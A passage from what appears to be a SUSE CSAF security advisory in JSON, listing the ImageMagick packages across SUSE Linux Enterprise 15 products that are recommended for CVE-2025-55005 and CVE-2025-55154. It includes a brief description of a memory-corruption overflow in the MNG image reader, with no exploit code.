"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:04:37Z",
"details": "important"
}
],
"title": "CVE-2025-55005"
},
{
"cve": "CVE-2025-55154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55154"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-27 and 7.1.2-1, the magnified size calculations in ReadOneMNGIMage (in coders/png.c) are unsafe and can overflow, leading to memory corruption. This issue has been patched in versions 6.9.13-27 and 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
